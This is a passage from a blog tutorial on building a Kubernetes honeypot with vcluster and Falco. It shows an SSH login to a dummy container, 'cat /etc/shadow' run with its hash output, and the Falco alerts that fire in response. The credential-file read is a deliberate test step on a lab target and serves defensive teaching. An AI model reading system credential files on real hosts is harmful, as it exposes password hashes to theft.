kube-system   replicaset.apps/coredns-d4b75cb6d   1         1         1       4m
NAMESPACE   NAME                   READY   AGE
vcluster    statefulset.apps/ssh   1/1     1m

Now, we can see the resources for Falco as well as the synced resources from our ssh install. This time, it is seen as running in the vcluster namespace we created on the host cluster.

Testing out our honeypot

Great, we have everything assembled now. Let’s do something to trip a Falco rule in our honeypot target and see how everything works so far.

The most convenient way to simulate a real intrusion is to use three different terminal windows.

Terminal 1

In terminal 1, we’ll set up a port forward in order to expose our ssh server to the local machine. This terminal needs to stay open while we test in order to expose the ssh service.

kubectl port-forward svc/my-dummy-ssh 5555:22

This command will expose the service on 127.0.0.1, port 5555. We need to make sure that we are running in the vcluster context for this window. If we are in the host cluster context, we can switch back by running the command vcluster connect ssh -n vcluster.

$ kubectl port-forward svc/my-dummy-ssh 5555:22
Forwarding from 127.0.0.1:5555 -> 22
Forwarding from [::1]:5555 -> 22

Terminal 2

In this terminal, we will ssh into the service that we just exposed on port 5555. The credentials are root/THEPASSWORDYOUCREATED.

$ ssh -p 5555 root@127.0.0.1
The authenticity of host '[127.0.0.1]:5555 ([127.0.0.1]:5555)' can't be established.
ED25519 key fingerprint is SHA256:eLwgzyjvrpwDbDr+pDbIfUhlNANB4DPH9/0w1vGa87E.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[127.0.0.1]:5555' (ED25519) to the list of known hosts.
root@127.0.0.1's password: 
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 5.10.57 x86_64)
 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

Once we have logged in with ssh, then we want to do something to trip a Falco rule. For example, viewing /etc/shadow should get us a hit.

root@my-dummy-ssh-7f98c68f95-5vwns:~# cat /etc/shadow
root:$6$hJ/W8Ww6$pLqyBWSsxaZcksn12xZqA1Iqjz.15XryeIEZIEsa0lbiOR9/3G.qtXl/SvfFFCTPkElo7VUD7TihuOyVxEt5j/:18281:0:99999:7:::
daemon:*:18275:0:99999:7:::
bin:*:18275:0:99999:7:::
sys:*:18275:0:99999:7:::
sync:*:18275:0:99999:7:::
<snip>

Terminal 3

In this terminal, we will view the logs from the falco pod.

$ kubectl logs falco-zwfcj -n falco
23:22:26.726981623: Notice Redirect stdout/stdin to network connection (user=root user_loginuid=-1 k8s.ns=vcluster k8s.pod=my-dummy-ssh-7f98c68f95-5vwns-x-default-x-ssh container=cffc68f50e06 process=sshd parent=sshd cmdline=sshd -D terminal=0 container_id=cffc68f50e06 image=securecodebox/dummy-ssh fd.name=172.17.0.1:40312->172.17.0.6:22 fd.num=1 fd.type=ipv4 fd.sip=172.17.0.6)
23:22:27.709831799: Warning Sensitive file opened for reading by non-trusted program (user=root user_loginuid=0 program=cat command=cat /etc/shadow file=/etc/shadow parent=bash gparent=sshd ggparent=sshd gggparent=<NA> container_id=cffc68f50e06 image=securecodebox/dummy-ssh) k8s.ns=vcluster k8s.pod=my-dummy-ssh-7f98c68f95-5vwns-x-default-x-ssh container=cffc68f50e06

Here, we will see many entries for the Notice Redirect stdout/stdin to network connection rule, as a result of our port forwarding. But we should also see the Warning Sensitive file opened for reading by non-trusted program rule fire, as a result of our taking a peek at /etc/shadow.

Falco detects inside container inside honeypot

Voila! This is Falco catching us mucking about with things that we should not be, via an ssh connection to our target, inside of our vcluster cluster, and inside of the host cluster.

Burn it all down

If we want to clean up the mess we’ve made, or if things go sideways enough for us to want to start over, we can clean everything out with a few simple commands: uninstall Falco and our ssh server, clean out minikube, and tidy a few temp files we might trip over later.

$ helm delete falco --namespace falco; helm delete my-dummy-ssh --namespace default; minikube delete --all -purge; sudo rm /tmp/juju*
release "falco" uninstalled
release "my-dummy-ssh" uninstalled
🔥  Deleting "minikube" in virtualbox ...
💀  Removed all traces of the "minikube" cluster.
🔥  Successfully deleted all profiles
[sudo] password for user:

But wait, there’s more!

Virtual clusters show a great deal of promise for use in honeypots and for security research in general. This is sure to be an exciting field to watch, both in terms of future developments and how the technology industry puts these tools to use.

What we built here is a good start, but there are quite a few more interesting things we can do to polish and enhance.

Ready for more? Check out the next in the series – Honeypots with vcluster and Falco: Episode II, where we leverage Falco Sidekick and other assorted open source tools.

The post Building honeypots with vcluster and Falco: Episode I appeared first on Sysdig.

]]>